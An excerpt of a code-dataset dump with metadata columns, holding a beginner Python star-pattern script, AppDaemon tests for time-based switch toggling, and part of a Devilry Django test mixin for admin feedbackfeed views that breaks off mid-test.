] | null | null | null | 16_loops_pat.py | teluguprogrammer/learn-python3 | 9565b50ecfff5c2ae39e780afb9a2a15682d1109 | [
"MIT"
] | null | null | null | #
# #
# # #
# # # #
# # # # #
for i in range(1, 11): # 1 -> 10
print('* ' * i)
for i in range(1, 11): # 1 -> 10
print('* ' * (10-i)) | 12.909091 | 32 | 0.338028 | 21 | 142 | 2.285714 | 0.380952 | 0.166667 | 0.25 | 0.458333 | 0.916667 | 0.916667 | 0.916667 | 0.916667 | 0.916667 | 0 | 0 | 0.152174 | 0.352113 | 142 | 11 | 33 | 12.909091 | 0.369565 | 0.105634 | 0 | 0.5 | 0 | 0 | 0.04 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 10 |
bdcf91b8bcaddbc079a4de9e878a94c8753d9e9b | 10,102 | py | Python | tests/time_based_toggle_automations_test.py | Robert1991/appdaemon | ba346d5b79d24ae7684390e717c1030e317d7600 | [
"Unlicense"
] | null | null | null | tests/time_based_toggle_automations_test.py | Robert1991/appdaemon | ba346d5b79d24ae7684390e717c1030e317d7600 | [
"Unlicense"
] | null | null | null | tests/time_based_toggle_automations_test.py | Robert1991/appdaemon | ba346d5b79d24ae7684390e717c1030e317d7600 | [
"Unlicense"
] | null | null | null | from apps.general.time_based_toggle_automations import TimeBasedToggleAutomation
from apps.general.time_based_toggle_automations import TurnOnOffInterval
from datetime import time
from mock import patch
from appdaemontestframework import automation_fixture
@automation_fixture(TurnOnOffInterval)
def turn_on_off_interval(given_that):
given_that.passed_arg('toggled_entity') \
.is_set_to('switch.toggled_entity')
given_that.passed_arg('on_interval_length') \
.is_set_to('input_number.on_interval_length')
given_that.passed_arg('off_interval_length') \
.is_set_to('input_number.off_interval_length')
given_that.state_of('input_number.on_interval_length') \
.is_set_to('60', {'unit_of_measurement': 's'})
given_that.state_of('input_number.off_interval_length') \
.is_set_to('120', {'unit_of_measurement': 's'})
TurnOnOffInterval.initialize_on_creation = False
def test_initialize_timers_on_off_interval_without_time_restriction(turn_on_off_interval, given_that, assert_that, time_travel):
turn_on_off_interval.initalize_timers(None, None, None, None, None)
assert_that('switch.toggled_entity').was.turned_on()
given_that.mock_functions_are_cleared()
time_travel.fast_forward(61).seconds()
assert_that('switch.toggled_entity').was.turned_off()
time_travel.fast_forward(118).seconds()
given_that.mock_functions_are_cleared()
assert_that('switch.toggled_entity').was_not.turned_on()
time_travel.fast_forward(3).seconds()
assert_that('switch.toggled_entity').was.turned_on()
def test_initialize_timers_without_time_restriction_timer_reinitialized_on_event(turn_on_off_interval, given_that, assert_that, time_travel):
with patch('appdaemon.adapi.ADAPI.timer_running'):
turn_on_off_interval.initalize_timers(None, None, None, None, None)
assert_that('switch.toggled_entity').was.turned_on()
given_that.mock_functions_are_cleared()
time_travel.fast_forward(30).seconds()
turn_on_off_interval.initalize_timers(None, None, None, None, None)
time_travel.fast_forward(31).seconds()
assert_that('switch.toggled_entity').was_not.turned_off()
given_that.mock_functions_are_cleared()
time_travel.fast_forward(30).seconds()
assert_that('switch.toggled_entity').was.turned_off()
@automation_fixture(TimeBasedToggleAutomation)
def toggle_automation(given_that):
given_that.passed_arg('time_interval_start') \
.is_set_to('input_datetime.interval_start')
given_that.passed_arg('time_interval_end') \
.is_set_to('input_datetime.interval_end')
given_that.passed_arg('toggled_entity') \
.is_set_to('switch.toggled_switch')
TimeBasedToggleAutomation.initialize_on_creation = False
def test_initalize_timers_both_timer_activated_and_switch_not_turned_on_because_earlier_as_start_time(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=16))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('02:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=2, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_off()
def test_initalize_timers_both_timer_activated_and_switch_turned_on_because_earlier_as_end_time(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=1))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('02:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=2, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_on()
def test_initalize_timers_both_timer_activated_and_switch_turned_off_because_earlier_as_start_time_on_same_day(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=18))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('20:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=20, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_off()
def test_initalize_timers_both_timer_activated_and_switch_turned_because_later_as_start_time_on_same_day(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=19))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('02:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=2, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_on()
def test_initalize_timers_both_timer_activated_and_switch_turned_because_later_as_start_time_on_the_next_day(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=1))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('02:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=2, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_on()
def test_initalize_timers_both_timer_activated_and_switch_turned_off_because_later_as_end_time_on_the_next_day(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=3))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('18:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('02:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=18, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=2, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_off()
def test_initalize_timers_both_timer_activated_and_switch_turned_off_because_later_as_end_time_on_the_same_day(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=17))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('10:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('16:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=10, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=16, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_off()
def test_initalize_timers_on_event_check_timer_cancelled_when_new_event_occurs(given_that, toggle_automation, assert_that, time_travel):
given_that.time_is(time(hour=17))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('10:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('16:30:00')
toggle_automation.initalize_timers(None, None, None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=10, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=16, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_off()
given_that.mock_functions_are_cleared()
given_that.time_is(time(hour=17))
given_that.state_of('input_datetime.interval_start') \
.is_set_to('10:30:00')
given_that.state_of('input_datetime.interval_end') \
.is_set_to('17:30:00')
toggle_automation.initalize_timers_on_event(None, None, None)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=10, minute=30), toState=True) \
.with_callback(toggle_automation.toggle)
assert_that(toggle_automation) \
.registered.run_daily(time(hour=17, minute=30), toState=False) \
.with_callback(toggle_automation.toggle)
assert_that("switch.toggled_switch").was.turned_on()
| 43.543103 | 168 | 0.753514 | 1,396 | 10,102 | 5.022206 | 0.07808 | 0.123235 | 0.058194 | 0.050207 | 0.903723 | 0.889174 | 0.834831 | 0.824704 | 0.787905 | 0.768221 | 0 | 0.023692 | 0.135122 | 10,102 | 231 | 169 | 43.731602 | 0.778757 | 0 | 0 | 0.710227 | 0 | 0 | 0.137498 | 0.10879 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.068182 | false | 0.034091 | 0.028409 | 0 | 0.096591 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da02cd1d0397e93d60f3a59452ccad121498bf92 | 30,200 | py | Python | devilry/devilry_group/tests/test_feedbackfeed/mixins/mixin_feedbackfeed_admin.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 29 | 2015-01-18T22:56:23.000Z | 2020-11-10T21:28:27.000Z | devilry/devilry_group/tests/test_feedbackfeed/mixins/mixin_feedbackfeed_admin.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 786 | 2015-01-06T16:10:18.000Z | 2022-03-16T11:10:50.000Z | devilry/devilry_group/tests/test_feedbackfeed/mixins/mixin_feedbackfeed_admin.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 15 | 2015-04-06T06:18:43.000Z | 2021-02-24T12:28:30.000Z | # -*- coding: utf-8 -*-
import mock
from django import http
from django.conf import settings
from django.http import Http404
from django.utils import timezone
from model_bakery import baker
from devilry.apps.core import models as core_models
from devilry.devilry_account import models as account_models
from devilry.devilry_account.models import PeriodPermissionGroup
from devilry.devilry_group import devilry_group_baker_factories as group_baker
from devilry.devilry_group import models as group_models
from devilry.devilry_group.cradmin_instances import crinstance_admin
from devilry.devilry_group.tests.test_feedbackfeed.mixins import mixin_feedbackfeed_common
class MixinTestFeedbackfeedAdmin(mixin_feedbackfeed_common.MixinTestFeedbackFeed):
"""
Mixin testclass for admin feedbackfeed tests.
Add tests for functionality and ui that all admin views share.
"""
viewclass = None
def __mock_cradmin_instance(self):
mockinstance = mock.MagicMock()
mockinstance.get_devilryrole_for_requestuser.return_value = 'admin'
return mockinstance
def test_get(self):
candidate = baker.make('core.Candidate',
relatedstudent=baker.make('core.RelatedStudent'))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=candidate.assignment_group,
requestuser=candidate.relatedstudent.user)
self.assertEqual(mockresponse.selector.one('title').alltext_normalized,
candidate.assignment_group.assignment.get_path())
def test_move_deadline_button_rendered_if_deadline_expired_and_feedbackset_is_not_graded(self):
testuser = baker.make(settings.AUTH_USER_MODEL)
deadline_datetime = timezone.now() - timezone.timedelta(days=1)
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
test_feedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup,
deadline_datetime=deadline_datetime)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=test_feedbackset.group,
requestuser=testuser,
cradmin_instance=self.__mock_cradmin_instance()
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-event__grade-move-deadline-button'))
def test_move_deadline_button_not_rendered_if_deadline_expired_and_feedbackset_is_graded(self):
testuser = baker.make(settings.AUTH_USER_MODEL)
deadline_datetime = timezone.now() - timezone.timedelta(days=1)
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
test_feedbackset = group_baker.feedbackset_first_attempt_published(
group=testgroup, deadline_datetime=deadline_datetime, grading_published_datetime=deadline_datetime)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=test_feedbackset.group,
requestuser=testuser,
cradmin_instance=self.__mock_cradmin_instance()
)
self.assertFalse(mockresponse.selector.exists('.devilry-group-event__grade-move-deadline-button'))
def test_new_attempt_button_rendered_if_deadline_expired_and_feedbackset_is_graded(self):
testuser = baker.make(settings.AUTH_USER_MODEL)
deadline_datetime = timezone.now() - timezone.timedelta(days=1)
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
test_feedbackset = group_baker.feedbackset_first_attempt_published(
group=testgroup, deadline_datetime=deadline_datetime, grading_published_datetime=deadline_datetime)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=test_feedbackset.group,
requestuser=testuser,
cradmin_instance=self.__mock_cradmin_instance()
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-event__grade-last-new-attempt-button'))
def test_new_attempt_button_not_rendered_if_deadline_expired_and_feedbackset_not_graded(self):
testuser = baker.make(settings.AUTH_USER_MODEL)
deadline_datetime = timezone.now() - timezone.timedelta(days=1)
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
test_feedbackset = group_baker.feedbackset_first_attempt_unpublished(
group=testgroup, deadline_datetime=deadline_datetime)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=test_feedbackset.group,
requestuser=testuser,
cradmin_instance=self.__mock_cradmin_instance()
)
self.assertFalse(mockresponse.selector.exists('.devilry-group-event__grade-last-new-attempt-button'))
def test_assignment_deadline_hard_expired_comment_form_rendered(self):
testuser = baker.make(settings.AUTH_USER_MODEL)
deadline_datetime = timezone.now() - timezone.timedelta(days=1)
test_feedbackset = baker.make('devilry_group.FeedbackSet',
deadline_datetime=deadline_datetime,
group__parentnode__deadline_handling=core_models.Assignment.DEADLINEHANDLING_HARD,
group__parentnode__parentnode=baker.make_recipe(
'devilry.apps.core.period_active'))
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=test_feedbackset.group,
requestuser=testuser,
cradmin_instance=self.__mock_cradmin_instance()
)
self.assertTrue(mockresponse.selector.exists('.cradmin-legacy-form-wrapper'))
self.assertFalse(mockresponse.selector.exists('.devilry-feedbackfeed-form-disabled'))
def test_get_examiner_discuss_tab_buttons(self):
testgroup = baker.make('core.AssignmentGroup')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=testgroup)
self.assertEqual(2, mockresponse.selector.count('.devilry-group-feedbackfeed-discuss-button'))
def test_get_feedbackfeed_event_delivery_passed(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
max_points=10,
passing_grade_min_points=5)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
feedbackset = group_baker.feedbackset_first_attempt_published(
group=testgroup,
grading_points=7)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=feedbackset.group)
self.assertTrue(mockresponse.selector.exists('.devilry-core-grade-passed'))
self.assertFalse(mockresponse.selector.exists('.devilry-core-grade-failed'))
def test_get_feedbackfeed_event_delivery_failed(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
max_points=10,
passing_grade_min_points=5)
testgroup = baker.make('core.AssignmentGroup', parentnode=assignment)
feedbackset = group_baker.feedbackset_first_attempt_published(
group=testgroup,
grading_points=0)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=feedbackset.group)
self.assertTrue(mockresponse.selector.exists('.devilry-core-grade-failed'))
self.assertFalse(mockresponse.selector.exists('.devilry-core-grade-passed'))
def test_get_feedbackfeed_periodadmin(self):
period = baker.make('core.Period')
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
admin = baker.make(settings.AUTH_USER_MODEL)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
baker.make('devilry_account.PermissionGroupUser',
user=admin,
permissiongroup=baker.make(
'devilry_account.PeriodPermissionGroup',
permissiongroup__grouptype=account_models.PermissionGroup.GROUPTYPE_PERIODADMIN,
period=period).permissiongroup)
comment = baker.make('devilry_group.GroupComment',
user_role='admin',
user=admin,
text='Hello, is it me you\'re looking for?',
feedback_set=testfeedbackset,
visibility=group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=comment.feedback_set.group)
self.assertEqual(
'periodadmin',
PeriodPermissionGroup.objects.get_devilryrole_for_user_on_period(
period=period, user=admin))
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-comment-admin'))
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_comment_admin(self):
admin = baker.make('devilry_account.User', shortname='periodadmin', fullname='Thor the norse god')
period = baker.make_recipe('devilry.apps.core.period_active',
admins=[admin],
parentnode__admins=[baker.make('devilry_account.User', shortname='subjectadmin')],
parentnode__parentnode__admins=[baker.make('devilry_account.User',
shortname='nodeadmin')])
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
admin = baker.make(settings.AUTH_USER_MODEL)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
comment = baker.make('devilry_group.GroupComment',
user_role='admin',
user=admin,
feedback_set=testfeedbackset,
visibility=group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=comment.feedback_set.group)
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-comment-admin'))
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_periodadmin_raise_404_semi_anonymous(self):
# Mocks the return value of the crinstance's get_devilry_role_for_requestuser to return the user role.
# It's easier to read if we mock the return value rather than creating a
# permission group(this crinstance-function with permission groups is tested separately for the instance)
testperiod = baker.make('core.Period')
testassignment = baker.make('core.Assignment',
parentnode=testperiod,
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, shortname='thor', fullname='Thor Thunder God')
mockrequest = mock.MagicMock()
mockrequest.cradmin_instance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
with self.assertRaisesMessage(http.Http404, ''):
self.mock_getrequest(requestuser=testuser, cradmin_role=testgroup,
cradmin_instance=mockrequest.cradmin_instance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_periodadmin_raise_404_fully_anonymous(self):
# Mocks the return value of the crinstance's get_devilry_role_for_requestuser to return the user role.
# It's easier to read if we mock the return value rather than creating a
# permission group(this crinstance-function with permission groups is tested separately for the instance)
testperiod = baker.make('core.Period')
testassignment = baker.make('core.Assignment',
parentnode=testperiod,
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, shortname='thor', fullname='Thor Thunder God')
mockrequest = mock.MagicMock()
mockrequest.cradmin_instance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
with self.assertRaisesMessage(http.Http404, ''):
self.mock_getrequest(requestuser=testuser, cradmin_role=testgroup,
cradmin_instance=mockrequest.cradmin_instance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_subjectadmin_can_see_student_name_semi_anonymous(self):
# Mocks the return value of the crinstance's get_devilry_role_for_requestuser to return the user role.
# It's easier to read if we mock the return value rather than creating a
# permission group(this crinstance-function with permission groups is tested separately for the instance)
testassignment = baker.make('core.Assignment',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
candidate = baker.make('core.Candidate',
assignment_group=testgroup,
relatedstudent__user__shortname='teststudent')
baker.make('devilry_group.GroupComment',
user=candidate.relatedstudent.user,
user_role='student',
feedback_set=testfeedbackset)
mockrequest = mock.MagicMock()
mockrequest.cradmin_instance.get_devilryrole_for_requestuser.return_value = 'subjectadmin'
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=testgroup,
cradmin_instance=mockrequest.cradmin_instance)
self.assertFalse(mockresponse.selector.exists('.devilry-core-candidate-anonymous-name'))
self.assertTrue(mockresponse.selector.exists('.devilry-user-verbose-inline'))
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_subjectadmin_raise_404_fully_anonymous(self):
# Mocks the return value of the crinstance's get_devilry_role_for_requestuser to return the user role.
# It's easier to read if we mock the return value rather than creating a
# permission group(this crinstance-function with permission groups is tested separately for the instance)
testassignment = baker.make('core.Assignment',
anonymizationmode=core_models.Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, shortname='thor', fullname='Thor Thunder God')
mockrequest = mock.MagicMock()
mockrequest.cradmin_instance.get_devilryrole_for_requestuser.return_value = 'subjectadmin'
with self.assertRaisesMessage(http.Http404, ''):
self.mock_getrequest(requestuser=testuser, cradmin_role=testgroup,
cradmin_instance=mockrequest.cradmin_instance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_periodadmin_no_access(self):
# Periodadmin does not have access to view when the user is not periodadmin for that period.
period1 = baker.make('core.Period')
period2 = baker.make('core.Period')
admin = baker.make(settings.AUTH_USER_MODEL)
permissiongroup = baker.make('devilry_account.PeriodPermissionGroup',
permissiongroup__grouptype=account_models.PermissionGroup.GROUPTYPE_PERIODADMIN,
period=period2)
baker.make('devilry_account.PermissionGroupUser',
user=admin,
permissiongroup=permissiongroup.permissiongroup)
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period1)
mockrequest = mock.MagicMock()
mockrequest.user = admin
mockrequest.cradmin_role = testgroup
crinstance = crinstance_admin.AdminCrInstance(request=mockrequest)
with self.assertRaises(Http404):
self.mock_getrequest(cradmin_role=testgroup, cradmin_instance=crinstance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_subjectadmin_no_access(self):
# Subjectadmin does not have access to view when the user is not subjectadmin for that perdiod
subject1 = baker.make('core.Subject')
subject2 = baker.make('core.Subject')
admin = baker.make(settings.AUTH_USER_MODEL)
permissiongroup = baker.make('devilry_account.SubjectPermissionGroup',
permissiongroup__grouptype=account_models.PermissionGroup.GROUPTYPE_SUBJECTADMIN,
subject=subject2)
baker.make('devilry_account.PermissionGroupUser',
user=admin,
permissiongroup=permissiongroup.permissiongroup)
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode__parentnode=subject1)
mockrequest = mock.MagicMock()
mockrequest.user = admin
mockrequest.cradmin_role = testgroup
crinstance = crinstance_admin.AdminCrInstance(request=mockrequest)
with self.assertRaises(Http404):
self.mock_getrequest(cradmin_role=testgroup, cradmin_instance=crinstance)
self.assertEqual(1, group_models.FeedbackSet.objects.count())
def test_get_feedbackfeed_download_visible_public_commentfiles_exist(self):
testassignment = baker.make('core.Assignment')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
candidate = baker.make('core.Candidate', assignment_group=testgroup)
group_comment = baker.make('devilry_group.GroupComment',
user=candidate.relatedstudent.user,
feedback_set=testfeedbackset)
baker.make('devilry_comment.CommentFile', comment=group_comment)
mock_cradmininstance = mock.MagicMock()
mock_cradmininstance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
cradmin_instance=mock_cradmininstance,
requestuser=testuser
)
self.assertTrue(
'Download:' in mockresponse.selector.one('.devilry-group-feedbackfeed-buttonbar').alltext_normalized)
def test_get_feedbackfeed_download_not_visible_private_commentfile_exist(self):
testassignment = baker.make('core.Assignment')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
testuser = baker.make(settings.AUTH_USER_MODEL)
group_comment = baker.make('devilry_group.GroupComment',
feedback_set=testfeedbackset,
visibility=group_models.GroupComment.VISIBILITY_PRIVATE)
baker.make('devilry_comment.CommentFile', comment=group_comment)
mock_cradmininstance = mock.MagicMock()
mock_cradmininstance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
cradmin_instance=mock_cradmininstance,
requestuser=testuser
)
self.assertFalse(
'Download:' in mockresponse.selector.one('.devilry-group-feedbackfeed-buttonbar').alltext_normalized)
def test_get_feedbackfeed_download_not_visible_part_of_grading_not_published(self):
testassignment = baker.make('core.Assignment')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
testuser = baker.make(settings.AUTH_USER_MODEL)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
group_comment = baker.make('devilry_group.GroupComment',
feedback_set=testfeedbackset,
user=examiner.relatedexaminer.user,
user_role='examiner',
part_of_grading=True)
baker.make('devilry_comment.CommentFile', comment=group_comment)
mock_cradmininstance = mock.MagicMock()
mock_cradmininstance.get_devilryrole_for_requestuser.return_value = 'periodadmin'
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
cradmin_instance=mock_cradmininstance,
requestuser=testuser
)
self.assertFalse(
'Download:' in mockresponse.selector.one('.devilry-group-feedbackfeed-buttonbar').alltext_normalized)
def test_get_no_edit_link_for_other_users_comments(self):
admin = baker.make('devilry_account.User', shortname='periodadmin', fullname='Thor')
period = baker.make_recipe('devilry.apps.core.period_active',
admins=[admin])
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
feedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
baker.make('devilry_group.GroupComment',
user_role='examiner',
feedback_set=feedbackset)
baker.make('devilry_group.GroupComment',
user_role='student',
feedback_set=feedbackset)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=testgroup, requestuser=admin)
self.assertFalse(mockresponse.selector.exists('.devilry-group-comment-edit-link'))
self.assertFalse(mockresponse.selector.exists('.devilry-group-comment-edit-link__admin'))
self.assertFalse(mockresponse.selector.exists('.devilry-group-comment-edit-link__student'))
self.assertFalse(mockresponse.selector.exists('.devilry-group-comment-edit-link__examiner'))
def test_get_edit_link(self):
admin = baker.make('devilry_account.User', shortname='periodadmin', fullname='Thor')
period = baker.make_recipe('devilry.apps.core.period_active',
admins=[admin])
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
feedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
baker.make('devilry_group.GroupComment',
user=admin,
user_role='admin',
feedback_set=feedbackset)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=testgroup,
requestuser=admin)
self.assertTrue(mockresponse.selector.exists('.devilry-group-comment-edit-link__admin'))
self.assertTrue('Edit',
mockresponse.selector.one('.devilry-group-comment-edit-link__admin').alltext_normalized)
def test_get_edit_link_url(self):
admin = baker.make('devilry_account.User', shortname='periodadmin', fullname='Thor')
period = baker.make_recipe('devilry.apps.core.period_active',
admins=[admin])
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
feedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
groupcomment = baker.make('devilry_group.GroupComment',
user=admin,
user_role='admin',
feedback_set=feedbackset)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=testgroup,
requestuser=admin)
self.assertTrue(mockresponse.selector.exists('.devilry-group-comment-edit-link__admin'))
self.assertEqual(mockresponse.selector.one('.devilry-group-comment-edit-link__admin').get('href'),
'/devilry_group/admin/{}/feedbackfeed/groupcomment-edit/{}'.format(
testgroup.id, groupcomment.id))
def test_get_num_queries(self):
period = baker.make('core.Period')
admin = baker.make(settings.AUTH_USER_MODEL, shortname='thor', fullname='Thor Thunder God')
baker.make('devilry_account.PermissionGroupUser',
user=admin,
permissiongroup=baker.make(
'devilry_account.PeriodPermissionGroup',
permissiongroup__grouptype=account_models.PermissionGroup.GROUPTYPE_PERIODADMIN,
period=period).permissiongroup)
testgroup = baker.make('core.AssignmentGroup', parentnode__parentnode=period)
